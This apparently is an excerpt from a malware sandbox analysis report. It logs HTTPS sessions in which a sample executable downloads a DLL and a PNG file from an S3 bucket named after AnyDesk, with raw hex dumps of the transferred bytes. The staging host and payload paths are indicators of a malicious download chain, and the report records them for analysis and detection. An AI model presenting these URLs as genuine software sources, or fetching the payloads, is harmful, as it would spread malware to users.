                                                                                                                                                                          Data Ascii: PNGIHDR]pHYs%%IR$tEXtSoftwareSnipaste] IDATxW$;%={b2p+euO1_07Ah*#D "b&"&G""c1@>33~%"j&{eK/ML9t53Hd [iT] &fLcPOG%
                                                                                                                                                                          2024-12-18 12:06:29 UTC586INData Raw: 1d 75 6a 36 9d 1f c0 11 91 47 72 d3 ca e0 b8 12 59 c4 c3 98 d5 d0 07 db 89 88 f1 c6 83 8b 76 f6 3a 5c 25 19 1a 5d 20 29 c0 cd 05 2f bc 12 02 be b2 63 9e c9 b0 0e 65 ed 5d 95 7a d3 10 2f 17 91 f5 b2 da a5 09 2c ab 69 70 b9 77 f7 96 e4 b2 27 b5 16 44 37 89 40 e8 d7 dc 86 58 3b 07 b0 35 1e b6 86 19 5c d0 37 37 a4 89 3d 99 00 00 20 00 49 44 41 54 96 d9 5d b4 60 e9 de ba 18 06 12 80 74 86 20 63 d0 ce 7b 02 3d 3f 91 99 f8 35 d4 91 50 82 32 7b 89 3d fc 03 f1 8b d5 1a c4 99 86 cd 35 18 f5 88 40 81 89 31 bf 1c df 2a 3e 67 93 1d 1e 92 6d 05 cc 0c 25 b2 7e 9d 23 b7 48 fb 68 67 47 22 f6 17 45 ac 87 cd de b9 74 43 27 3e e2 8d 67 27 50 af e5 d0 79 e4 6c 81 14 44 44 6f df 98 65 5c a7 88 d3 05 78 ae 74 94 40 a4 1a 65 93 dd 21 87 08 30 c6 50 9f 80 fb 5a c7 33 83 b5 e8 c8
                                                                                                                                                                          Data Ascii: uj6GrYv:\%] )/ce]z/,ipw'D7@X;5\77= IDAT]`t c{=?5P2{=5@1*>gm%~#HhgG"EtC'>g'PylDDoe\xt@e!0PZ3
                                                                                                                                                                          2024-12-18 12:06:30 UTC16384INData Raw: 4e 15 60 56 76 63 d7 8e f3 f5 b1 33 9d e4 41 ca d1 d6 04 5e 0d d2 d4 6c f9 2b 21 6c 32 b6 c8 cf 5a 9c 9f de bf f8 a5 14 e8 be b8 96 ef 2b 29 ad c3 b3 54 97 e7 d0 33 6d 71 9b 94 0f 23 76 f1 93 aa 1e 24 3e ef e0 df 6e 9a b0 6c 1b f8 dd 24 82 7f ff fb df 2a cd 78 77 03 59 91 41 c9 ae 93 19 f1 24 99 36 72 23 e3 4b 7d f9 1b 1d ff 46 42 9f 7b 7e 10 ff f9 8b 90 23 7c e1 ff 64 fa 27 9a ff bb a3 1f f4 bc 48 eb 7f 86 ea 8a 45 f1 4f cd e5 f7 b4 f5 e6 6b 04 f8 92 ce 2f 64 e3 d3 e4 f2 ad e9 c5 22 22 e6 d6 df f5 da 5b f6 80 92 06 85 72 56 a5 da 7b fb 04 3f 23 99 44 38 da 13 31 43 d3 e2 5b 7b 83 22 b7 e6 d4 18 6c f1 23 cb 95 42 27 8d 97 28 ae 96 a5 c8 6f 16 47 f5 f7 29 f3 54 d1 ab 51 d3 ec 8c ba 2d 02 11 e8 b9 e5 e4 86 aa f5 a4 ac 10 bb 66 5e d8 d9 b0 de 1a d8 ab d3 07
                                                                                                                                                                          Data Ascii: N`Vvc3A^l+!l2Z+)T3mq#v$>nl$*xwYA$6r#K}FB{~#|d'HEOk/d""[rV{?#D81C[{"l#B'(oG)TQ-f^
                                                                                                                                                                          2024-12-18 12:06:30 UTC1024INData Raw: c0 4f 71 0a 82 19 3f 2d 8b 47 12 8b 4e 1c 23 07 3f 58 0d ea 7e 8e ae 83 94 ef a0 a2 e4 ef 70 51 87 df 0f c5 d6 60 dc 3c ab 53 fb c4 79 b6 28 d4 37 26 a4 2a 81 d7 09 89 d1 0e c8 da ca 02 5d 66 7b ed b5 f7 e6 16 72 71 db fe 7e d0 12 68 e4 9e 15 9d 2a ff 9a 63 b8 b3 44 15 ad 92 99 04 0e 45 17 bc ec e4 a1 d7 64 5b ef 28 50 2e b9 ec 0e e5 b4 7d b2 bd 24 bd ef 90 73 ae b5 b7 31 54 3c 5e 5c 5a dd 57 00 aa 32 74 a8 ea f6 a8 ff ea 7c 6e d5 b8 20 7f fc 44 a1 dc 19 9d 0f 30 b4 88 28 a2 22 37 36 fb 5e 1e 5b 94 18 35 5c 91 64 cd 91 3a 54 d5 10 ba 9b cb 5f 11 95 55 25 48 c2 db 1c f0 e9 d4 8a 38 23 d9 43 21 8b fe 0d 50 e3 24 45 19 95 de ab 6e 9f 3b 41 54 85 14 af f4 67 09 1b 67 90 82 a2 43 b2 d3 5f 5f 71 df bf 0f 66 72 f1 cf ef e8 e4 fc b5 6d 6a 6f 79 ca 77 a4 f5 b8 19
                                                                                                                                                                          Data Ascii: Oq?-GN#?X~pQ`<Sy(7&*]f{rq~h*cDEd[(P.}$s1T<^\ZW2t|n D0("76^[5\d:T_U%H8#C!P$En;ATggC__qfrmjoyw
                                                                                                                                                                          2024-12-18 12:06:30 UTC16384INData Raw: 5c 14 11 d3 d4 23 23 34 4a b8 41 24 2e 4e 51 e7 a1 ee c2 f5 0f ee 90 14 c8 1c fa 67 0e 97 32 ca 48 8e 80 4f a8 50 a7 3e 02 12 5d 15 73 e8 19 a2 13 07 17 f1 b1 01 1f 7c a3 64 53 49 fb f6 a4 28 b4 e7 68 c5 6c 67 29 87 c3 be 72 dd 8b 3c 4d 40 55 9d b2 11 62 4e b2 1e 10 d8 24 68 1e b4 18 12 7a 96 4d 2b 78 db c6 6d 7b c3 0d 7e b6 f3 98 a6 65 db 09 64 db 7e af 37 33 51 b8 e1 62 bc f1 0e 32 7b aa 52 7d 33 fe 47 5c a5 a6 f1 b1 97 2f 5c fc fc 0e cb 40 00 a4 b2 25 02 3d d6 f9 10 26 e1 92 d9 11 34 d0 c0 13 80 60 be dc 21 77 d6 b5 09 19 df 8f 44 7a 2c 86 7a 56 b9 84 4e e8 f4 3a 74 88 aa 0a 44 d4 74 f3 80 76 fa bd e3 78 01 42 f4 61 a7 ba 71 11 9d 0f 7c 87 8b a7 c4 4f c3 92 f6 dd bf b3 c8 3e c3 9f 9f ff f9 72 92 2c 3a 3e 9d 39 63 7b f6 30 d9 d9 5f ae 58 17 9e cf f8 d8
                                                                                                                                                                          Data Ascii: \##4JA$.NQg2HOP>]s|dSI(hlg)r<M@UbN$hzM+xm{~ed~73Qb2{R}3G\/\@%=&4`!wDz,zVN:tDtvxBaq|O>r,:>9c{0_X
                                                                                                                                                                          2024-12-18 12:06:30 UTC1024INData Raw: c8 b2 1a b2 96 ed 1a 7d 00 db 99 cf ed 5f 3c 59 99 b8 2d dc 02 32 55 7d 7a d5 4d 4b 2f 7e 29 b9 a4 7c 7c 59 bb a3 f0 ec 93 10 d9 09 d4 ac e6 2b 44 05 ff 17 9e 18 01 70 4c 66 cb 6a 9c 84 fd 5c e2 48 48 e2 61 3a 5f 85 d5 14 13 61 ff d4 e1 88 43 3b 06 1e 03 3a 28 22 bf 44 dc 4c 1c e3 1f 5d 89 a1 1a cc 78 d9 e1 07 27 92 4e ff 24 87 e0 eb 4b 3c 97 43 88 5f 2e 28 e8 42 ed af c7 20 31 58 a6 d6 cc 7f 99 b3 e7 b3 7f 9e e7 49 9b 53 33 40 09 01 28 91 81 da db cc af 85 ce a9 fa 0d 1e 40 da 77 11 aa c4 90 8a 10 96 95 d1 fd 7e 17 0a 19 dc 1c 16 6c dc f9 72 66 fa a8 fa 86 d1 46 9c c0 77 6f 55 00 0a 88 9a 19 28 46 e1 21 f8 12 1e 03 c7 80 87 75 63 b6 3c 06 2f f6 99 4d 4d 14 54 a5 e7 85 7e 0a 0f ab 69 5f c0 53 b8 88 48 d5 ce 26 0b 15 95 93 b4 5f bf 1e 32 78 64 38 9b 63 f8
                                                                                                                                                                          Data Ascii: }_<Y-2U}zMK/~)||Y+DpLfj\HHa:_aC;:("DL]x'N$K<C_.(B 1XIS3@(@w~lrfFwoU(F!uc</MMT~i_SH&_2xd8c
                                                                                                                                                                          2024-12-18 12:06:30 UTC1749INData Raw: cf fe 86 e6 cc f8 6e d4 65 a2 2c ff 34 36 1f aa 8b c0 5a 8e 81 00 3c 4f d8 8e 8b 1b 34 5d d1 87 d9 68 b3 1c b7 fb d0 87 54 6c 97 6f ff e9 65 bf 5d 62 21 62 e0 e2 79 9e 73 9e e7 b9 70 51 95 53 dc 85 d6 a3 d4 8b 8d 6c 3b 1e 82 48 e8 93 c4 50 f3 cb 24 fb 5a 50 35 e8 92 4f 80 5c 65 fe 49 66 5c 02 d2 fb 23 7c 11 d7 9b c8 ba 8d 62 b0 63 3c 52 d9 75 6b 3c f4 a1 e7 3c ce af 63 9e 53 64 1c bf 7e f9 27 ae 66 3d 46 ec 52 85 5c 62 db 4a 4c a9 6d fd 7f e1 62 fa 4a 34 59 d3 84 f4 0c 85 0d 11 d1 b4 45 70 38 f7 a7 40 06 e5 90 91 ba 66 08 71 c2 cd dc d2 27 ce ad 64 67 fa a9 7a e9 8e 8b 79 4e 66 f1 6a f7 57 08 55 5c 4f b7 29 16 cf 5e 36 12 4b 0c 6a 95 0e b3 b3 76 d4 02 17 d5 74 00 f6 78 c8 63 8c 41 19 f0 64 54 a3 70 d1 87 6a 64 38 82 38 bd 1d 5e 2f 91 e9 e5 f9 1c ff fe 1e
                                                                                                                                                                          Data Ascii: ne,46Z<O4]hTloe]b!byspQSl;HP$ZP5O\eIf\#|bc<Ruk<<cSd~'f=FR\bJLmbJ4YEp8@fq'dgzyNfjWU\O)^6KjvtxcAdTpjd88^/
                                                                                                                                                                          2024-12-18 12:06:30 UTC9000INData Raw: bf f0 b5 e2 0c 09 4c 99 20 5a e2 72 4d 53 83 a9 4d 77 09 5c 74 85 6b 85 25 f0 79 b6 23 77 63 83 32 9a 50 58 12 8a a8 0c 85 12 b3 a0 c5 cc 8c a6 ac 05 e0 d0 3f 68 c2 49 78 c0 2c 0b f4 2f d9 96 5b b1 79 9d 65 f9 b0 6c 02 63 d7 63 7b 97 c9 64 ad b4 b3 a2 0d a6 fd a5 be 21 0a e3 b3 cd c0 8a f8 93 a4 65 30 62 4e 25 74 62 46 d2 2e 13 01 8e 88 7b 1f fe 5c 19 68 37 1c 58 34 73 81 d1 7a 30 7c a4 90 66 bd 71 2a 01 d8 a1 7f cf d8 3c 1e e3 f8 f5 35 8e 21 6a 60 1a 66 9d 9f 34 d7 25 0f 6b 60 ee c9 4f 51 3f 7b b1 d0 3d e3 aa ef 52 6b d2 ab 71 50 4a 5f 4c 7d 32 e3 6f a4 81 76 08 06 cd cf 5c 59 4c 9c ba 4b 93 e9 8c e1 cb 51 4f 99 c5 00 0c 91 14 67 98 51 d2 82 79 38 aa 9c 16 a1 0a 35 87 a7 96 a3 e6 6e ad 33 12 cb bf 9e 11 ce 2a e4 56 90 aa 34 d3 e9 87 25 c2 ff d6 73 71 d8
                                                                                                                                                                          Data Ascii: L ZrMSMw\tk%y#wc2PX?hIx,/[yelcc{d!e0bN%tbF.{\h7X4sz0|fq*<5!j`f4%k`OQ?{=RkqPJ_L}2ov\YLKQOgQy85n3*V4%sq
                                                                                                                                                                          2024-12-18 12:06:30 UTC16384INData Raw: 3f 1b 60 01 8c 41 d9 02 a6 d4 1e db f6 2b d6 39 4d 92 6b 75 b8 95 07 af d6 51 ae 73 9a d9 34 23 26 36 6e e0 aa 9c 2a ce fe b9 b8 8e e0 c1 31 4d 11 d9 94 ac ed fd b5 89 8e a3 87 56 2c 35 5a 4a 0b e3 81 79 90 18 34 cd 24 9a 18 3f e7 4a 5d 5a 16 55 c7 99 16 d2 21 31 29 f5 c2 3c fc e7 1b 8b 93 c1 f2 65 0c 98 eb df 53 a7 e9 39 a7 9e a7 ce 79 3c 06 48 8e 75 c5 4e 9d c8 31 86 1f 2f 0f 5e bb 2d 25 00 38 3c 74 1a a0 3a 6b 1e 7d f9 38 e4 44 38 9d 57 f8 8e 85 8b 70 db c0 75 fa 5b 54 af 18 1c f5 4e 79 20 05 c2 e0 04 8c 86 8b b1 75 5a 76 04 a3 45 40 4b 96 20 e3 ee ad be c8 cc 4f 4d 2b 84 94 11 c7 e7 d4 4c 75 5a 4b 72 4c 52 8d f5 93 c1 f6 bb 4a 6d 06 a4 11 75 0d d3 1d 17 37 51 62 1b d5 cb f3 1b eb 29 ca 9e d9 a6 b2 c4 16 dd b7 e1 7e 09 30 04 3c 58 a2 53 70 da 1f 2e 2f
                                                                                                                                                                          Data Ascii: ?`A+9MkuQs4#&6n*1MV,5ZJy4$?J]ZU!1)<eS9y<HuN1/^-%8<t:k}8D8Wpu[TNy uZvE@K OM+LuZKrLRJmu7Qb)~0<XSp./
                                                                                                                                                                          2024-12-18 12:06:30 UTC1024INData Raw: 99 a7 1e 0d cd b0 b1 a7 6d a1 c5 15 42 75 7f 6c 3e 3b 01 68 ef 81 c8 68 61 52 26 30 d9 09 d4 6d cb 59 0f 2a a6 fb 6d bb e2 71 c2 5a 7a b2 b7 7a 09 6f f4 da cd 98 47 61 c1 e3 18 b3 3a d6 1e 1c c8 aa 35 a9 85 32 13 81 ca 90 50 35 37 88 84 e9 9e cc 9c f3 f1 85 1b 50 05 37 ee ee a4 14 1d 87 84 d6 d0 25 d7 99 cb 31 45 2a ac 60 af e8 1a b3 da cc 7b 59 de 17 3d 4b d6 c8 aa 49 2e 70 d9 96 2a 8f 61 e3 49 6d dc 7b 79 ff da 95 14 4e 9e ee d2 e2 ac fa d6 f7 c4 7c 10 49 8f f5 b9 a9 b5 7a 24 6f af 6c c0 c6 cd 7e 7a 6f 16 ec 6b e7 33 3a c2 42 27 55 18 df 2e dc 83 ea ca de d1 fc 3c 6f fc c3 06 d8 76 df 24 c3 cc 7e b3 dd 2f 6f 5b 77 e2 a8 56 b4 21 20 9f d3 10 15 c7 85 51 f8 94 6b 30 12 07 63 8d 77 ec cb 71 9b 8a e1 70 02 9c a6 ef 7a 69 63 0b 02 10 8a 02 b9 c5 45 88 ed 60
                                                                                                                                                                          Data Ascii: mBul>;hhaR&0mY*mqZzzoGa:52P57P7%1E*`{Y=KI.p*aIm{yN|Iz$ol~zok3:B'U.<ov$~/o[wV! Qk0cwqpzicE`


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.84972152.95.162.664431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:36 UTC80OUTGET /vcruntime140_1.dll HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          2024-12-18 12:06:37 UTC425INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: IKklgBIGQ85iPJ17KXeF6ibdx1cfm8juPjow40KF0dnG4ElKmrYDEf7DqTd4qncRatkUqqpXQSw=
                                                                                                                                                                          x-amz-request-id: VFS7T7102D6XM1A8
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:38 GMT
                                                                                                                                                                          Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                                                                                                          ETag: "eb49c1d33b41eb49dfed58aafa9b9a8f"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                          Content-Length: 49744
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:37 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 39 40 b7 57 7d 21 d9 04 7d 21 d9 04 7d 21 d9 04 ae 53 d8 05 7f 21 d9 04 7b a0 d8 05 7f 21 d9 04 74 59 4a 04 76 21 d9 04 7d 21 d8 04 4e 21 d9 04 7b a0 da 05 78 21 d9 04 7b a0 dd 05 7a 21 d9 04 7b a0 dc 05 66 21 d9 04 7b a0 d9 05 7c 21 d9 04 7b a0 26 04 7c 21 d9 04 7b a0 db 05 7c 21 d9 04 52 69 63 68 7d 21 d9 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$9@W}!}!}!S!{!tYJv!}!N!{x!{z!{f!{|!{&|!{|!Rich}!PEd
                                                                                                                                                                          2024-12-18 12:06:37 UTC599INData Raw: d8 72 00 00 00 00 00 00 c4 72 00 00 00 00 00 00 b0 72 00 00 00 00 00 00 92 72 00 00 00 00 00 00 76 72 00 00 00 00 00 00 62 72 00 00 00 00 00 00 4e 72 00 00 00 00 00 00 34 72 00 00 00 00 00 00 1e 72 00 00 00 00 00 00 08 72 00 00 00 00 00 00 ee 71 00 00 00 00 00 00 e0 71 00 00 00 00 00 00 c6 71 00 00 00 00 00 00 b4 71 00 00 00 00 00 00 a2 71 00 00 00 00 00 00 94 71 00 00 00 00 00 00 8a 71 00 00 00 00 00 00 7c 71 00 00 00 00 00 00 6e 71 00 00 00 00 00 00 62 71 00 00 00 00 00 00 3a 71 00 00 00 00 00 00 cc 70 00 00 00 00 00 00 dc 70 00 00 00 00 00 00 ee 70 00 00 00 00 00 00 1a 71 00 00 00 00 00 00 02 71 00 00 00 00 00 00 2a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 70 00 00 00 00 00 00 9a 70 00 00 00 00 00 00 62 70 00 00 00 00 00 00 7a 70 00 00 00 00 00
                                                                                                                                                                          Data Ascii: rrrrvrbrNr4rrrqqqqqqq|qnqbq:qpppqq*qppbpzp
                                                                                                                                                                          2024-12-18 12:06:38 UTC16384INData Raw: 00 f8 64 00 80 01 00 00 00 b0 25 00 80 01 00 00 00 50 31 00 80 01 00 00 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 98 52 00 80 01 00 00 00 d8 52 00 80 01 00 00 00 18 53 00 80 01 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 66 00 69 00 62 00 65 00 72 00 73 00 2d 00 6c 00 31 00 2d 00 31 00 2d 00 31 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 73 00 79 00 6e 00 63 00 68 00 2d 00 6c 00 31 00 2d 00 32 00 2d 00 30 00 00 00 00 00 00 00 00 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 00 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 00 00 00 00 00 00 02 00 00 00 46 6c 73 41 6c 6c 6f 63 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: d%P1bad exceptionRRSapi-ms-win-core-fibers-l1-1-1api-ms-win-core-synch-l1-2-0kernel32api-ms-FlsAlloc
                                                                                                                                                                          2024-12-18 12:06:38 UTC1024INData Raw: c8 11 3b fb 3a 17 cf aa 46 e3 52 84 39 07 85 b8 f5 0d 12 55 6d 05 2c ae 61 1c 28 0e 83 ec 48 c9 30 b9 f2 a1 82 3f cc 30 82 17 90 06 0a 2b 06 01 04 01 82 37 03 03 01 31 82 17 80 30 82 17 7c 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 17 6d 30 82 17 69 02 01 03 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 82 01 52 06 0b 2a 86 48 86 f7 0d 01 09 10 01 04 a0 82 01 41 04 82 01 3d 30 82 01 39 02 01 01 06 0a 2b 06 01 04 01 84 59 0a 03 01 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 e7 03 93 4d 32 1f 2d 95 1f 30 4e 11 8b a0 2d cd 18 c5 2d 56 d1 3e 82 74 a9 a1 4d 70 aa 9c 30 2c 02 06 65 a0 07 e9 a2 c7 18 13 32 30 32 34 30 31 31 39 31 37 34 30 34 30 2e 36 34 39 5a 30 04 80 02 01 f4 a0 81 d1 a4 81 ce 30 81 cb 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                                                                                                                                                          Data Ascii: ;:FR9Um,a(H0?0+710|*Hm0i10`He0R*HA=09+Y010`He M2-0N--V>tMp0,e20240119174040.649Z0010UUS1
                                                                                                                                                                          2024-12-18 12:06:38 UTC10157INData Raw: d5 32 d4 7f fa 28 bb 20 0e 27 f2 27 9f 68 a1 dc 04 8f d1 06 26 f8 01 50 8e 16 03 34 3b bc bb 33 1d c0 71 79 41 dc 2c b1 c3 5a f4 f5 52 19 e7 4b 74 32 e8 f6 32 fa 0e 83 c5 e0 d6 28 d3 a9 6f bc 44 2e 48 9f 48 9b 06 5f 04 62 f2 ff c8 69 13 b4 43 e1 ec 2f 24 a9 8c d7 eb 7a 79 0b 84 b1 35 e3 ac 63 36 5a 39 16 d7 c4 a0 51 9f 27 f9 5a 4b da e9 3a 02 10 e4 09 ad f9 e4 8e 77 d6 9d 09 92 aa 68 a2 7e dd 1e e2 d4 75 94 90 3b 8d 2a 99 52 10 ea a4 02 6a 7b c8 99 3a a6 36 01 3f ac f2 74 ae 0a f4 84 c3 c8 fe e4 75 4f f8 9a 2f 49 84 ab 86 ea 6a 4f b7 b1 af 08 f8 50 18 38 8f cf 0b b5 7e cc 47 a4 fa c7 72 5a d6 97 fa 77 5b 1a 5b ff 44 96 f9 99 06 86 9f c3 6e 9d b9 1f bc 70 f5 42 de 43 d2 b9 ad 30 e7 a4 60 ca bb 42 36 2a 13 71 44 3f fc 00 63 84 c3 b8 9c 6c b6 3b 1a d8 75 e2
                                                                                                                                                                          Data Ascii: 2( ''h&P4;3qyA,ZRKt22(oD.HH_biC/$zy5c6Z9Q'ZK:wh~u;*Rj{:6?tuO/IjOP8~GrZw[[DnpBC0`B6*qD?cl;u
                                                                                                                                                                          2024-12-18 12:06:38 UTC5196INData Raw: 30 82 02 0a 02 82 02 01 00 c5 7d a9 39 ec ea 61 f6 fb b1 b6 5a 00 06 22 dc e9 e9 d3 fb 22 87 eb 5f 5b f8 e8 46 76 4c a1 80 dc e4 5f cd 0a 50 62 3f 8c 4a 8e 54 c5 78 4a ab 7f 50 f1 45 89 dc 76 b7 bb f6 48 44 e3 da d0 33 b9 52 ad 0d fa b6 1c 1a 6e f3 4b d9 d2 fc 90 0f 27 55 b7 83 03 2f 8b 49 48 aa a0 62 87 c2 c4 32 01 ad 6c c9 26 38 01 a2 52 9d 38 9c 75 ba dd 93 c8 e7 3e 50 e9 bb 7b dd ad 54 f1 e9 8d d8 3e 3a 67 f7 d5 32 d4 7f fa 28 bb 20 0e 27 f2 27 9f 68 a1 dc 04 8f d1 06 26 f8 01 50 8e 16 03 34 3b bc bb 33 1d c0 71 79 41 dc 2c b1 c3 5a f4 f5 52 19 e7 4b 74 32 e8 f6 32 fa 0e 83 c5 e0 d6 28 d3 a9 6f bc 44 2e 48 9f 48 9b 06 5f 04 62 f2 ff c8 69 13 b4 43 e1 ec 2f 24 a9 8c d7 eb 7a 79 0b 84 b1 35 e3 ac 63 36 5a 39 16 d7 c4 a0 51 9f 27 f9 5a 4b da e9 3a 02 10
                                                                                                                                                                          Data Ascii: 0}9aZ""_[FvL_Pb?JTxJPEvHD3RnK'U/IHb2l&8R8u>P{T>:g2( ''h&P4;3qyA,ZRKt22(oD.HH_biC/$zy5c6Z9Q'ZK:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.84972252.95.162.664431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:40 UTC70OUTGET /view.png HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          2024-12-18 12:06:41 UTC416INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: MGA/C1Odh8gQl1h860LU6bWytOPPSBgtygFqOpyCQzGpEHWomCsxomno/UKw3SJuMrecrYH6j0M=
                                                                                                                                                                          x-amz-request-id: 8PSCTYY89BS53JBC
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:41 GMT
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 20:28:18 GMT
                                                                                                                                                                          ETag: "1e17e3f8b9917ce02cdb53f289db96c9"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                          Content-Length: 376421
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:41 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 5d 00 00 01 86 08 02 00 00 00 ce f1 a3 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c ec bd 57 a2 24 3b 8e 25 08 d0 3d 7b cd b3 85 d9 62 ef a4 32 dc 70 e6 03 9a a4 89 2b e2 65 75 4f 31 5f de 30 37 a3 00 41 68 2a fe df ff ef ff 03 92 e3 23 44 20 22 62 26 22 26 ce 47 22 22 1e 63 10 31 40 96 8d a8 3e 33 33 b3 7e 25 22 10 6a 26 10 83 06 13 7b 65 4b 02 00 2f bc 4d 4c c4 cc 91 39 fe d6 87 8b 74 9b e3 35 06 33 8b 48 64 e6 02 18 20 06 06 5b 1f 14 98 02 12 69 16 f6 54 ca a2 94 5d 00 b3 0c 20 26 66 8a b2 db 9e e6 b3 0f 4c e4 1f 63 50 c5 4f 47 0e 00 c8 25 0e 98 06 8f ec f6 92
                                                                                                                                                                          Data Ascii: PNGIHDR]pHYs%%IR$tEXtSoftwareSnipaste] IDATxW$;%={b2p+euO1_07Ah*#D "b&"&G""c1@>33~%"j&{eK/ML9t53Hd [iT] &fLcPOG%
                                                                                                                                                                          2024-12-18 12:06:41 UTC608INData Raw: 1d 75 6a 36 9d 1f c0 11 91 47 72 d3 ca e0 b8 12 59 c4 c3 98 d5 d0 07 db 89 88 f1 c6 83 8b 76 f6 3a 5c 25 19 1a 5d 20 29 c0 cd 05 2f bc 12 02 be b2 63 9e c9 b0 0e 65 ed 5d 95 7a d3 10 2f 17 91 f5 b2 da a5 09 2c ab 69 70 b9 77 f7 96 e4 b2 27 b5 16 44 37 89 40 e8 d7 dc 86 58 3b 07 b0 35 1e b6 86 19 5c d0 37 37 a4 89 3d 99 00 00 20 00 49 44 41 54 96 d9 5d b4 60 e9 de ba 18 06 12 80 74 86 20 63 d0 ce 7b 02 3d 3f 91 99 f8 35 d4 91 50 82 32 7b 89 3d fc 03 f1 8b d5 1a c4 99 86 cd 35 18 f5 88 40 81 89 31 bf 1c df 2a 3e 67 93 1d 1e 92 6d 05 cc 0c 25 b2 7e 9d 23 b7 48 fb 68 67 47 22 f6 17 45 ac 87 cd de b9 74 43 27 3e e2 8d 67 27 50 af e5 d0 79 e4 6c 81 14 44 44 6f df 98 65 5c a7 88 d3 05 78 ae 74 94 40 a4 1a 65 93 dd 21 87 08 30 c6 50 9f 80 fb 5a c7 33 83 b5 e8 c8
                                                                                                                                                                          Data Ascii: uj6GrYv:\%] )/ce]z/,ipw'D7@X;5\77= IDAT]`t c{=?5P2{=5@1*>gm%~#HhgG"EtC'>g'PylDDoe\xt@e!0PZ3
                                                                                                                                                                          2024-12-18 12:06:41 UTC16384INData Raw: d4 6c f9 2b 21 6c 32 b6 c8 cf 5a 9c 9f de bf f8 a5 14 e8 be b8 96 ef 2b 29 ad c3 b3 54 97 e7 d0 33 6d 71 9b 94 0f 23 76 f1 93 aa 1e 24 3e ef e0 df 6e 9a b0 6c 1b f8 dd 24 82 7f ff fb df 2a cd 78 77 03 59 91 41 c9 ae 93 19 f1 24 99 36 72 23 e3 4b 7d f9 1b 1d ff 46 42 9f 7b 7e 10 ff f9 8b 90 23 7c e1 ff 64 fa 27 9a ff bb a3 1f f4 bc 48 eb 7f 86 ea 8a 45 f1 4f cd e5 f7 b4 f5 e6 6b 04 f8 92 ce 2f 64 e3 d3 e4 f2 ad e9 c5 22 22 e6 d6 df f5 da 5b f6 80 92 06 85 72 56 a5 da 7b fb 04 3f 23 99 44 38 da 13 31 43 d3 e2 5b 7b 83 22 b7 e6 d4 18 6c f1 23 cb 95 42 27 8d 97 28 ae 96 a5 c8 6f 16 47 f5 f7 29 f3 54 d1 ab 51 d3 ec 8c ba 2d 02 11 e8 b9 e5 e4 86 aa f5 a4 ac 10 bb 66 5e d8 d9 b0 de 1a d8 ab d3 07 88 c5 cb fc bd 0f 40 40 78 7a 11 cb b3 74 cd 7d 00 22 ce 17 39 7f
                                                                                                                                                                          Data Ascii: l+!l2Z+)T3mq#v$>nl$*xwYA$6r#K}FB{~#|d'HEOk/d""[rV{?#D81C[{"l#B'(oG)TQ-f^@@xzt}"9
